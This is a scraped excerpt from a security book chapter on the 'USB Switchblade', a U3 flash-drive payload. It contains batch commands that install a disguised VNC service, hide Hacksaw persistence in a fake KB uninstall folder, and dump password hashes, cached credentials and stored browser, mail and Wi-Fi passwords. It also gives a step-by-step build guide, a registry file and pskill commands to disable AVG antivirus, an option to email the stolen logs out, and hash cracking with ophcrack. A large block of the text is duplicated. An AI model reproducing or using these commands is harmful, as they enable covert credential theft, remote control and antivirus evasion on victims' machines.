Seven deadliest usb attacks phần 3
- 23 trang
- file .pdf
Inside the Switchblade 33
TightVNC
TightVNC is a remote-control software package that is provided free of charge (GNU
General Public License)A with full source-code availability. It provides a stable cli-
ent or server remote utility, permitting graphical desktop representations of a target
UNIX and Windows platforms via the local network or Internet. This version of
VNC provides enhanced capabilities such as file transfers, mirrored drivers (effi-
cient screen updates), remote desktop scaling, and a new Tight encoding with JPEG
compression, which optimizes slow connections generating significantly less traf-
fic. Browser access is also included via an HTTP server and a Java viewer applet.
Two passwords are supported for read-only and full control access. TightVNC is
sustained by Constantin Kaplinsky with the assistance of multiple corporations who
participate in development and life-cycle support. Updated software can be found at
www.tightvnc.com/download.php.
Note
Look at the clever display name and service description inserted in the script below put in
place to deter an uninformed user from stopping it.
XCOPY ".\vnc\*.*" "%systemroot%" /c /y
SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type=
interact type= own start= auto
displayname= "Domain Client Service" 2>&1
SC description WinVNC "Manages communication between a Windows
Server Domain Controller and a connected Domain Client. If this
service is not started or disabled, domain functions will be
inoperable." 2>&1
REGEDIT /s .\vnc.reg 2>&1
NET START WinVNC 2>&1 The network statistics command
Hacksaw
This version of the USB Switchblade provides an option to install Hacksaw. It provides
the typical functions that were covered in Chapter 1, “USB Hacksaw,” with some minor
tweaks. This original version of the USB Switchblade transferred the log files contain-
ing the output back to the writable portion of the USB flash drive. While this feature is
still available, the addition of Hacksaw allows the logs to be sent via e-mail of the users
choosing. The sbs.exe will still run in the background and transfer the data of USB
drives that are inserted into the installed system. The supported version of the Hacksaw
program is included with the download package provided in the next section.
MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY
.\HS\*.* "%appdata%\sbs" /y 2>&1
A www.gnu.org/copyleft/gpl.html
34 CHAPTER 2 USB Switchblade
REG ADD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.
lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\
Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.
exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstall
KB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat"
"%appdata%\sbs\send.bat" 2>&1
COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\
stunnel.conf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.
conf" 2>&1
ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB
"%appdata%\sbs" +s +h 2>&1
.\SBS.lnk & .\SBS2.lnk
WirelessKeyView
WirelessKeyView is a utility from Nirsoft. It can recover all wireless network secu-
rity keys for the Wireless Encryption Protocol (WEP) and Wi-Fi Protected Access
(WPA) that are contained in the Wireless Zero Configuration (XP) and WLAN
AutoConfig (Vista) services on a system. This tool’s command options give you the
ability to sort or export to various formats. The following Web site can be checked if
updated versions are required: www.nirsoft.net/utils/wireless_key.html.
.\wifike.exe /stext %tmplog% >> %log% 2>&1
Password Dump
PwDump is a name given to several types of programs with multiple developers
that are able to provide an output of the NT LAN Manager (Windows NTLM) and
LAN Manager (LM) password hashes for user accounts contained in the local secu-
rity accounts manager (SAM). This tool is used to extract raw passwords from a
Windows SAM file. Once you have extracted the hashes from the Windows SAM
file, an alternate program can be used to find the exact text passwords used on the
system. The next section will describe the additional tools required to interpret the
hashes derived from this program. The most recent version of the software can be
found at www.tarasco.org/security/pwdump_7/index.html.
.\pwdump 127.0.0.1 >> %log% 2>&1
Fizzgig Dump
Fgdump was developed for use in environments with AV and other detection software
enabled. It includes the PwDump and CacheDump utilities in a wrapper to minimize
the number of issues that have been increasing while running these tools individu-
ally. The development of this tool appears to be in full swing, with extensive auditing
targeted for Windows domains and their respective trust relationships (additional
tools are required for this). This tool is being provided in addition to the individual
Inside the Switchblade 35
PwDump and CacheDump utilities in case problems are encountered running them
natively. The updated release of this software can be found at http://swamp.foofus.
net/fizzgig/fgdump/downloads.htm.
%U3%\fgdump.exe" -c >> %log% 2>&1
Network Password Recovery
Network Password Recovery allows an administrator to recover all passwords (includ-
ing domain) of the current logged-on user used for establishing connections to network
shares. It can also retrieve .NET Passport passwords for sites if they were saved in this
manner. External credentials files can also be parsed so long as the last logged-on
account password is known. This is another utility written by Nirsoft, and current ver-
sions can be found at www.nirsoft.net/utils/network_password_recovery.html.
.\netpass.exe /stext %tmplog% >> %log% 2>&1
Mail Password Viewer
Mail PassView is a tool that can reveal the password and account details for numer-
ous e-mail clients. The supported clients include Outlook Express, Microsoft Outlook
2000/2002/2003/2007, Windows Mail, Windows Live Mail, IncrediMail, Eudora,
Netscape 6.x/7.x (without master password encryption), Mozilla Thunderbird (with-
out master password encryption), Group Mail Free, Yahoo! Mail (if stored in Yahoo!
Messenger application), Hotmail/MSN mail (if stored in MSN/Windows/Live
Messenger application), and Gmail (if stored in Gmail Notifier application, Google
Desktop, or by Google Talk). Once again, this is another Nirsoft tool and updates can
be found at www.nirsoft.net/utils/mailpv.html.
.\mailpv.exe /stext %tmplog% >> %log% 2>&1
Firefox Password Recovery
FirePassword is a tool designed to decrypt the credentials from the Mozilla Firefox
database. Firefox records username and password details for every Web site the
user authorizes and stores them an encrypted database. The master password will
be needed if it is set; otherwise, it will not be able to display these. Some sites also
prevent the saving of passwords in a browser, which is another limitation that should
be considered. Check the following site for the most recent updates to this tool: www.
securityxploded.com/download/FirePassword_bin.zip.
.\FirePassword.exe >> %log% 2>&1
Internet Explorer Password Viewer
Internet Explorer PassView is another tool from Nirsoft designed to provide pass-
word management, which can reveal passwords that have been stored in the browser.
This utility can recover three different types of passwords: AutoComplete, HTTP
authentication passwords, and FTP. It gathers these by parsing Windows protected
storage, the registry, and a credential file. Known issues exist starting with Internet
36 CHAPTER 2 USB Switchblade
Explorer 7.0 because Microsoft is changing the way in which some passwords are
stored, so limitations may be encountered. The most recent versions of this software
include the ability to read offline or external sources if you know the password of the
last logged-on user for this profile. Check this site if updated versions are required:
www.nirsoft.net/utils/internet_explorer_password.html.
.\iepv.exe /stext %tmplog% >> %log% 2>&1
Messenger Password Recovery
MessenPass is another password recovery tool that reveals the passwords of com-
mon instant-messenger applications. It can be used only to recover the passwords
for the current logged-on user on the local computer, and it only works if you chose
the “remember your password” option in the programs. This tool cannot be used for
grabbing the passwords from other user profiles. When running MessenPass, it auto-
matically detects the instant-messenger applications installed on the target system,
decrypts the passwords, and displays all user credentials found. This Nirsoft tool can
be found at www.nirsoft.net/utils/mspass.html.
.\mspass.exe /stext %tmplog% >> %log% 2>&1
CacheDump
CacheDump was designed to capture the credentials of a domain user who is cur-
rently logged on to a system. It targets Windows’ inherent offline caching techniques
performed by the Local Security Authority (LSA) system service. This service uses
a cached version of the password to allow users to log on when a domain controller
is unavailable to authenticate them. This tool creates a temporary service, allowing it
to grab hash values of passwords, which can be taken offline for later cracking. The
most current release of this program can be found at www.hacktoolrepository.com/
category/9/Passwords.
.\cachedump.exe >> %log% 2>&1
Protected Storage Password Viewer
Protected Storage PassView is yet another Nirsoft tool designed to divulge passwords
housed on a system stored by Internet Explorer, Outlook Express, and MSN Explorer.
This tool also has the capability to reveal information stored in the AutoComplete
strings of Internet Explorer. If an update for this tool is required, check the following
location: www.nirsoft.net/utils/pspv.html.
.\pspv.exe /stext %tmplog% >> %log% 2>&1
Product Key Recovery
ProduKey, a tool from Nirsoft, presents the product identifier and the associated
keys for Microsoft products installed on the system. Microsoft Office 2003/2007,
Exchange, SQL, and even operating system (including Windows 7) keys can
be extracted using this. It is also capable of gathering keys from remote systems
if permissible and includes additional customizable command options for your
Inside the Switchblade 37
convenience. The following location contains additional information regarding this
tool: www.nirsoft.net/utils/product_cd_key_viewer.html.
.\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername%
>> %log% 2>&1
History Scraper
A preconfigured VB script has been included in the Switchblade download package
to provide a summary of the most recently viewed Web sites on the target machine.
No additional files or updates are required in order for this to complete.
CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1
Windows Updates Lister
WinUpdatesList will display all of the Windows updates, including hotfixes, that
are installed in a local or remote system. Hotfix information includes the associated
files, and the user interface will even provide a link to the Microsoft site, which
includes detailed information related to the specific update. This tool applies to
Windows 98, ME, 2000, and XP but is not yet available for Vista and later. The fol-
lowing Web site contains additional information regarding this tool: www.nirsoft.
net/utils/wul.html.
.\wul.exe /stext %tmplog% >> %log% 2>&1
Network Statistics
The network statistics command displays active network connections, listening ports,
associated processes, and a variety of other network statistics. This tool is already
included on all relevant Windows systems.
netstat.exe -abn >> %log% 2>&1
Port Query
Portqry.exe is a command-line utility that is often used to troubleshoot network con-
nectivity issues. Portqry.exe is included on systems based on Windows 2000, XP,
and 2003 and can be downloaded for use on others. The utility reports the status
of Transmission Control Protocol and User Datagram Protocol ports on a desired
machine. It is able to report listening, nonlistening, and filtered ports individually by
listing or in a sequential range. The most updated version of this tool can be found at
www.microsoft.com/downloads/details.aspx?familyid=89811747-c74b-4638-a2d5-
ac828bdc6983&displaylang=en.
.\portqry -local -l %tmplog% >> %log% 2>&1
The tools described above are already contained in the USB Switchblade pack-
age download provided in the next section. If you intend to use the tools included
in Switchblade, it would be in your best interest to familiarize yourself with each
independently. Each of these tools provides additional parameters and customization
38 CHAPTER 2 USB Switchblade
options depending on your needs. The attack recreation included below will provide
you with a basic understanding of how these are commonly deployed.
Switchblade Assembly
As previously stated, the ultimate goal of USB Switchblade is to simplify the recov-
ery of critical information from computers running Windows 2000 or later. With
administrator access, it is able to retrieve password hashes, LSA secrets, IP informa-
tion, and much more. This section will demonstrate how to build and deploy a U3
flash drive with the -=GonZor=- SwitchBlade technique.
Note
If User Account Control (UAC) is enabled on Vista or Windows 7, the user will be prompted
to allow the execution of the tools within the Switchblade. A dialogue box stating
“Windows need your permission to continue” will be displayed. This must be disabled on
these systems when building the Switchblade and to enable automated retrieval on target
systems.
This first set of directions included will build a default version of Switchblade.
These are provided for quick reference should you encounter an updated release
of the Switchblade software, which may better suit your needs. Customization
instructions will follow these procedures to allow you to update or add to existing
distributions.
1. The Switchblade v2.0 payload needs to be downloaded. This package can be found
at http://rapidshare.com/files/113283682/GonZors_SwitchBlade-V2.0.zip.
2. If you are using an XP system, the Universal Customizer software previously
downloaded for Chapter 1, “USB Hacksaw,” can be used to complete this process.
If you have Vista or 7 systems, download the compatible Universal Customizer at
http://rapidshare.de/files/40767219/Universal_Customizer_1.4.0.2.rar.html.
Warning
If any AV applications are running on the machine you are using to download or create the
U3 Switchblade, problems will be encountered. Most antivirus software will recognize the
tools contained in Switchblade as malicious and will attempt to remove them. To head off
any problems, disable antivirus on the system you are using to build Switchblade.
3. Create a separate directory for each programs you just downloaded and unzip the
files into their respective folders.
4. Place the U3CUSTOM.iso from the Switchblade folder into the bin folder of the
Universal Customizer directory.
5. Insert your U3 USB drive.
6. Launch the Universal Customizer by executing Universal_Customizer.exe.
Inside the Switchblade 39
7. Follow the on-screen instructions and prompts until complete, accepting the
default selections where applicable. Steps 9–13 in the “How to Recreate the
Attack” section of Chapter 1, “USB Hacksaw,” provides detailed directions and
screenshot illustrations for these steps.
8. If you receive a failure at the end, repeat steps 5 and 6 at least three times. If
failures persist, download and install the latest version of the LaunchPad installer
(lpinstaller.exe) at http://mp3support.sandisk.com/downloads/LPInstaller.exe.
Sporadic results can be encountered with this program as well, so let your tena-
cious side shine through.
9. Once you have successfully applied the Switchblade ISO using the Universal
Customizer process, place the SBConfig.exe and ip.shtml from the Switchblade
directory onto the removable disk partition and run SBConfig.exe.
10. Enable the desired tools by checking the appropriate boxes and entering all
other required information. After making your changes, select Update Config.
The next section will describe these and other steps in more detail and pro-
vide caveats for deployments on related systems. This completes a basic USB
Switchblade installation for the GonZor package.
Customizing the Original Payload
The steps below will walk you through updating an existing tool within a payload.
Testing of the package previously prescribed produced some errors when trying to
parse the updated target applications. Changes were made to the wget command
to properly output an external IP address in the log file. Additional procedures are
provided to disable AVG antivirus to smooth the automated initialization of the
Switchblade script. In order to modify the original payload, you will need to extract
the files from the GonZor ISO. This process can be used to update any of the tools
used in the payload. The following will be needed to complete this customization.
• Any U3 drive
• A working version of the GonZor USB Switchblade
• The current version of PsTools or the PsKill utility specifically. The download
location for this was provided in Chapter 1, “USB Hacksaw.”
• Download and install the current version of MagicISO. This tool can be down-
loaded from www.magiciso.com/.
Note
At the time of this writing, the most recent version of the Switchblade payload was v2.0.
1. Create a separate folder for each program you just downloaded and unzip the files
into their respective folders.
2. Create a new directory to extract the original GonZor ISO. We will refer to this
directory as %GONZOR_ISO%\ in the following steps.
3. Copy the U3CUSTOM.iso from the GonZor SwitchBlade payload directory into
%GONZOR_ISO%\.
40 CHAPTER 2 USB Switchblade
4. Open MagicISO and browse to the U3CUSTOM.iso. Right-click the U3CUSTOM.
iso file and extract to %GONZOR_ISO%\.
5. Copy pskill.exe to %GONZOR_ISO%\ SYSTEM\SRC.
Note
AVG 9.0 service name has changed in the registry. For this reason, there are two driver
entries specified in the file for both AVG 8.5 and AVG 9.0 in the next step. If you encounter
a newer release of AVG, this registry file may need to be adjusted to work in an updated
environment.
6. Next, create a .reg file to disable the AVG antivirus services and set them to take
no action in the event of a service failure. Copy and paste the text given below
into a Notepad file and save it as AVKill.reg. Any other services of concern can
be added to this file for disablement. The Start and FailureAction values included
here can be duplicated for the additional services.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg8wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,
00,53,00,65,\
00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,
ea,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\avg9wd]
"Start"=dword:00000004
"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,
00,53,00,65,\
00,00,00,00,00,60,ea,00,00,00,00,00,00,60,ea,00,00,00,00,00,00,60,
ea,00,00
7. Save this Notepad file as AVKill.reg to %GONZOR_ISO%\SYSTEM \SRC \.
8. Locate the go.bat file in %GONZOR_ISO%\SYSTEM \ SRC. Right-click and
select Edit, and then find the 0.dat line in this file.
9. In the go.bat, enter the following text. Killing of other processes is included as a
fail-safe due to inconsistencies found between the various versions of Windows
operating systems. If you added other services to the registry file in step 6, their
associated processes must be included here.
ECHO---------------------------------------------------------------
------------>> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [AVGKill] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO AVG services have been disabled >> %log% 2>&1
REGEDIT /s .\avkill.reg >> %log% 2>&1
.\pskill -t avgam.exe >> %log% 2>&1
Inside the Switchblade 41
.\pskill -t avgrsx.exe >> %log% 2>&1
.\pskill -t avgwdsvc >> %log% 2>&1
.\pskill -t avgnsx.exe >> %log% 2>&1
.\pskill -t avgcsrvx.exe >> %log% 2>&1
.\pskill -t avgtray.exe >> %log% 2>&1
.\pskill -t agrsmsvc.exe >> %log% 2>&1
.\pskill -t avgwdsvc.exe >> %log% 2>&1
)
IF EXIST %include%\19.dat" (
ECHO -------------------------------------------------------------
10. Search and find the 1.dat line in the same file. Place a “;” at the start of these
commands used for the wget. The wget commands should now appear like the
below statements.
;.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
;ECHO. >> %tmplog% 2>&1
;COPY %log%+%tmplog%* %log% >> NUL
;DEL /f /q %tmplog% >NUL
11. Insert the following wget command line just above the old wget command.
.\wget -q -O -
http://whatismyip.com/automation/n09230945.asp >> %log% 2>&1
12. Save and close the file.
13. Copy and paste the entire contents of %GONZOR_ISO%\ (except the
U3CUstom.iso) into the U3Custom folder of the Universal Customizer.
Tip
Ensure that the Universal Customizer\U3Custom directory is empty before you copy the
updated files into it. Only files that you want included in the final ISO should be contained
in this folder.
14. Run the ISOCreate.cmd in the root of the Universal Customizer directory to create
the updated ISO. The output provided should appear similar to Figure 2.1.
15. Press any key when prompted to complete the build.
16. The updated ISO will be placed into the bin directory automatically.
17. Insert your U3 drive and run the Universal_Customizer.exe to load the updated
ISO.
18. Follow the prompts until complete, accepting the default selections, and provide a
password when required. Steps 9–13 in the “How to Recreate the Attack” section
of Chapter 1, “USB Hacksaw,” provide screenshot illustrations for this process.
19. Insert the U3 drive and place the SBConfig.exe (this file is located in the
unpacked Switchblade payload) onto the removable disk partition and run it.
20. Select the tools from the payload that you want to run by checking the boxes,
as shown in Figure 2.2. The output of this script will be sent to a log file on
42 CHAPTER 2 USB Switchblade
Figure 2.1
Universal Customizer ISOCreate Command Window
Figure 2.2
GonZor Payload Configuration Options Dialogue
Inside the Switchblade 43
the removable disk partition of the U3 drive (System/Logs/%computername%/*.
log) after it is run.
21. Optionally, you can enter a valid mail account, password, and connection infor-
mation if you want the Switchblade logs and Hacksaw payloads to be sent to an
external source, as shown in Figure 2.2.
22. The payload will be disabled by default. When you are finished editing, click
Update Config and then Quit. Save the configuration when prompted.
23. You have now established a customized version of the -=GonZor=- Payload
v2.0 on your U3 smart drive, which can be used to retrieve all kinds of goodies
once it is plugged into a computer with administrative privileges.
As you can see, it wasn’t very difficult to customize a smart U3 USB. Use
extreme caution when anyone requests to insert his or her USB flash drive into
your system. The person could easily disguise a legitimate payload as a misdirec-
tion tactic while his or her Switchblade silently performs its magic. Unattended
XP, 2003,Vista, and 7 systems with password-protected screen savers engaged
will not allow autorun to initiate, thus preventing the programmatical process
without authentication. If the screen saver is not protected by a password, auto-
run can be engaged once the desktop becomes active. Windows 95, 98, and ME
screen savers can be circumvented, but these systems are scarcely seen in this
day and age.
Most of the tools worked correctly for Vista, with some success attained
on 7 systems. User interaction was required on both to initiate the script after
Switchblade insertion. To achieve better results on these systems, you will need
to find updated releases of each tool for the respective target operating system or
application.
Windows Password Hashes
Once you have successfully deployed the Switchblade on a target system,
retrieving the passwords from the hashes provided might be required. You will
need the Switchblade log file located on the removable disk partition of the
U3 flash drive (system/logs/%computername%/*.log). The Windows passwords
are hashed using LM and NTLM hashes. The hashes are stored in c:\windows\
system32\config\SAM. To get the passwords, you need to use a Windows pass-
word cracker to convert the LM hash format. The following steps will walk
you through the installation, configuration, and retrieval of a password using
ophcrack.
1. Download ophcrack from http://ophcrack.sourceforge.net/.
2. Double-click the installation executable and click Next, as seen in Figure 2.3.
3. Select all components, as shown in Figure 2.4, and click Next.
4. Install in the default directory, as indicated in Figure 2.5, and click Next.
5. Install the tables in the default directory, as depicted in Figure 2.6, and click
Install.
44 CHAPTER 2 USB Switchblade
Figure 2.3
ophcrack Installation Dialogue
Figure 2.4
ophcrack Installation Dialogue
Inside the Switchblade 45
Figure 2.5
ophcrack Installation Dialogue
Figure 2.6
ophcrack Installation Dialogue
46 CHAPTER 2 USB Switchblade
6. The tool will now be installed and the rainbow tables will be downloaded. A prog-
ress bar should reflect the remaining installation, as seen in Figure 2.7.
7. Click Next when prompted, as portrayed in Figure 2.8.
8. Click Finish to complete the install when prompted, as depicted in Figure 2.9.
9. If errors are encountered during the load or you just need additional tables, these
can be downloaded from the following locations.
• Download the XP Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/XP%20free/tables_xp_free_small.zip/download and
http://sourceforge.net/projects/ophcrack/files/tables/XP%20free/tables_xp_
free_fast.zip/download.
• Download the Vista Rainbow tables from http://sourceforge.net/projects/
ophcrack/files/tables/Vista%20free/tables_vista_free.zip/download.
10. Unzip the files once they are downloaded.
11. Launch ophcrack and click Tables, as shown in Figure 2.10.
12. You should now have a pane displaying the expected tables, which are in Figure 2.11.
Select the required table and click Install. XP free fast was used in this example.
13. Navigate to the location where you saved the table, as seen in Figure 2.12, and
click Install. Keep in mind that storing the rainbow tables on a fast medium like
Figure 2.7
ophcrack Installation Dialogue
Inside the Switchblade 47
Figure 2.8
ophcrack Installation Dialogue
Figure 2.9
ophcrack Installation Dialogue
48 CHAPTER 2 USB Switchblade
Figure 2.10
ophcrack Application
Figure 2.11
ophcrack Program Table Selection
Inside the Switchblade 49
Figure 2.12
ophcrack Program Table Selection
a hard disk or flash drive will significantly speed up the cracking process. Avoid
using tables from CD-ROMs or DVDs.
14. Next, copy and paste the results from the [Dump SAM PWDUMP] section of
the Switchblade log file on the U3 USB drive into a separate Notepad file.
15. Save the file in a known location.
16. In ophcrack, click Load and select PWDUMP file, as depicted in Figure 2.13.
17. Navigate to where you saved the Notepad file (step 15) and select it.
18. The LM hash from the file will be displayed in ophcrack, as shown in Figure 2.14.
19. Select Crack and wait for the results. The status will be displayed as shown in
Figure 2.15.
Given the number of possible password permutations, some results may take
longer than others. A 15-character password with good complexity could be very
difficult to crack, if even possible. Additional rainbow tables can be downloaded and
applied for more thorough analysis of a given hash.
50 CHAPTER 2 USB Switchblade
Figure 2.13
ophcrack Program Load Options
Figure 2.14
ophcrack Program LM Hash Display
TightVNC
TightVNC is a remote-control software package that is provided free of charge (GNU
General Public License)A with full source-code availability. It provides a stable cli-
ent or server remote utility, permitting graphical desktop representations of a target
UNIX and Windows platforms via the local network or Internet. This version of
VNC provides enhanced capabilities such as file transfers, mirrored drivers (effi-
cient screen updates), remote desktop scaling, and a new Tight encoding with JPEG
compression, which optimizes slow connections generating significantly less traf-
fic. Browser access is also included via an HTTP server and a Java viewer applet.
Two passwords are supported for read-only and full control access. TightVNC is
sustained by Constantin Kaplinsky with the assistance of multiple corporations who
participate in development and life-cycle support. Updated software can be found at
www.tightvnc.com/download.php.
Note
Look at the clever display name and service description inserted in the script below put in
place to deter an uninformed user from stopping it.
XCOPY ".\vnc\*.*" "%systemroot%" /c /y
SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type=
interact type= own start= auto
displayname= "Domain Client Service" 2>&1
SC description WinVNC "Manages communication between a Windows
Server Domain Controller and a connected Domain Client. If this
service is not started or disabled, domain functions will be
inoperable." 2>&1
REGEDIT /s .\vnc.reg 2>&1
NET START WinVNC 2>&1 The network statistics command
Hacksaw
This version of the USB Switchblade provides an option to install Hacksaw. It provides
the typical functions that were covered in Chapter 1, “USB Hacksaw,” with some minor
tweaks. This original version of the USB Switchblade transferred the log files contain-
ing the output back to the writable portion of the USB flash drive. While this feature is
still available, the addition of Hacksaw allows the logs to be sent via e-mail of the users
choosing. The sbs.exe will still run in the background and transfer the data of USB
drives that are inserted into the installed system. The supported version of the Hacksaw
program is included with the download package provided in the next section.
MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY
.\HS\*.* "%appdata%\sbs" /y 2>&1
A www.gnu.org/copyleft/gpl.html
34 CHAPTER 2 USB Switchblade
REG ADD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.
lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\
Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.
exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstall
KB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat"
"%appdata%\sbs\send.bat" 2>&1
COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\
stunnel.conf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.
conf" 2>&1
ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB
"%appdata%\sbs" +s +h 2>&1
.\SBS.lnk & .\SBS2.lnk
WirelessKeyView
WirelessKeyView is a utility from Nirsoft. It can recover all wireless network secu-
rity keys for the Wireless Encryption Protocol (WEP) and Wi-Fi Protected Access
(WPA) that are contained in the Wireless Zero Configuration (XP) and WLAN
AutoConfig (Vista) services on a system. This tool’s command options give you the
ability to sort or export to various formats. The following Web site can be checked if
updated versions are required: www.nirsoft.net/utils/wireless_key.html.
.\wifike.exe /stext %tmplog% >> %log% 2>&1
Password Dump
PwDump is a name given to several types of programs with multiple developers
that are able to provide an output of the NT LAN Manager (Windows NTLM) and
LAN Manager (LM) password hashes for user accounts contained in the local secu-
rity accounts manager (SAM). This tool is used to extract raw passwords from a
Windows SAM file. Once you have extracted the hashes from the Windows SAM
file, an alternate program can be used to find the exact text passwords used on the
system. The next section will describe the additional tools required to interpret the
hashes derived from this program. The most recent version of the software can be
found at www.tarasco.org/security/pwdump_7/index.html.
.\pwdump 127.0.0.1 >> %log% 2>&1
Fizzgig Dump
Fgdump was developed for use in environments with AV and other detection software
enabled. It includes the PwDump and CacheDump utilities in a wrapper to minimize
the number of issues that have been increasing while running these tools individu-
ally. The development of this tool appears to be in full swing, with extensive auditing
targeted for Windows domains and their respective trust relationships (additional
tools are required for this). This tool is being provided in addition to the individual
Inside the Switchblade 35
PwDump and CacheDump utilities in case problems are encountered running them
natively. The updated release of this software can be found at http://swamp.foofus.
net/fizzgig/fgdump/downloads.htm.
%U3%\fgdump.exe" -c >> %log% 2>&1
Network Password Recovery
Network Password Recovery allows an administrator to recover all passwords (includ-
ing domain) of the current logged-on user used for establishing connections to network
shares. It can also retrieve .NET Passport passwords for sites if they were saved in this
manner. External credentials files can also be parsed so long as the last logged-on
account password is known. This is another utility written by Nirsoft, and current ver-
sions can be found at www.nirsoft.net/utils/network_password_recovery.html.
.\netpass.exe /stext %tmplog% >> %log% 2>&1
Mail Password Viewer
Mail PassView is a tool that can reveal the password and account details for numer-
ous e-mail clients. The supported clients include Outlook Express, Microsoft Outlook
2000/2002/2003/2007, Windows Mail, Windows Live Mail, IncrediMail, Eudora,
Netscape 6.x/7.x (without master password encryption), Mozilla Thunderbird (with-
out master password encryption), Group Mail Free, Yahoo! Mail (if stored in Yahoo!
Messenger application), Hotmail/MSN mail (if stored in MSN/Windows/Live
Messenger application), and Gmail (if stored in Gmail Notifier application, Google
Desktop, or by Google Talk). Once again, this is another Nirsoft tool and updates can
be found at www.nirsoft.net/utils/mailpv.html.
.\mailpv.exe /stext %tmplog% >> %log% 2>&1
Firefox Password Recovery
FirePassword is a tool designed to decrypt the credentials from the Mozilla Firefox
database. Firefox records username and password details for every Web site the
user authorizes and stores them an encrypted database. The master password will
be needed if it is set; otherwise, it will not be able to display these. Some sites also
prevent the saving of passwords in a browser, which is another limitation that should
be considered. Check the following site for the most recent updates to this tool: www.
securityxploded.com/download/FirePassword_bin.zip.
.\FirePassword.exe >> %log% 2>&1
Internet Explorer Password Viewer
Internet Explorer PassView is another tool from Nirsoft designed to provide pass-
word management, which can reveal passwords that have been stored in the browser.
This utility can recover three different types of passwords: AutoComplete, HTTP
authentication passwords, and FTP. It gathers these by parsing Windows protected
storage, the registry, and a credential file. Known issues exist starting with Internet
36 CHAPTER 2 USB Switchblade
Explorer 7.0 because Microsoft is changing the way in which some passwords are
stored, so limitations may be encountered. The most recent versions of this software
include the ability to read offline or external sources if you know the password of the
last logged-on user for this profile. Check this site if updated versions are required:
www.nirsoft.net/utils/internet_explorer_password.html.
.\iepv.exe /stext %tmplog% >> %log% 2>&1
Messenger Password Recovery
MessenPass is another password recovery tool that reveals the passwords of com-
mon instant-messenger applications. It can be used only to recover the passwords
for the current logged-on user on the local computer, and it only works if you chose
the “remember your password” option in the programs. This tool cannot be used for
grabbing the passwords from other user profiles. When running MessenPass, it auto-
matically detects the instant-messenger applications installed on the target system,
decrypts the passwords, and displays all user credentials found. This Nirsoft tool can
be found at www.nirsoft.net/utils/mspass.html.
.\mspass.exe /stext %tmplog% >> %log% 2>&1
CacheDump
CacheDump was designed to capture the credentials of a domain user who is cur-
rently logged on to a system. It targets Windows’ inherent offline caching techniques
performed by the Local Security Authority (LSA) system service. This service uses
a cached version of the password to allow users to log on when a domain controller
is unavailable to authenticate them. This tool creates a temporary service, allowing it
to grab hash values of passwords, which can be taken offline for later cracking. The
most current release of this program can be found at www.hacktoolrepository.com/
category/9/Passwords.
.\cachedump.exe >> %log% 2>&1
Protected Storage Password Viewer
Protected Storage PassView is yet another Nirsoft tool designed to divulge passwords
housed on a system stored by Internet Explorer, Outlook Express, and MSN Explorer.
This tool also has the capability to reveal information stored in the AutoComplete
strings of Internet Explorer. If an update for this tool is required, check the following
location: www.nirsoft.net/utils/pspv.html.
.\pspv.exe /stext %tmplog% >> %log% 2>&1
Product Key Recovery
ProduKey, a tool from Nirsoft, presents the product identifier and the associated
keys for Microsoft products installed on the system. Microsoft Office 2003/2007,
Exchange, SQL, and even operating system (including Windows 7) keys can
be extracted using this. It is also capable of gathering keys from remote systems
if permissible and includes additional customizable command options for your
Inside the Switchblade 37
convenience. The following location contains additional information regarding this
tool: www.nirsoft.net/utils/product_cd_key_viewer.html.
.\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername%
>> %log% 2>&1
History Scraper
A preconfigured VB script has been included in the Switchblade download package
to provide a summary of the most recently viewed Web sites on the target machine.
No additional files or updates are required in order for this to complete.
CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1
Windows Updates Lister
WinUpdatesList will display all of the Windows updates, including hotfixes, that
are installed in a local or remote system. Hotfix information includes the associated
files, and the user interface will even provide a link to the Microsoft site, which
includes detailed information related to the specific update. This tool applies to
Windows 98, ME, 2000, and XP but is not yet available for Vista and later. The fol-
lowing Web site contains additional information regarding this tool: www.nirsoft.
net/utils/wul.html.
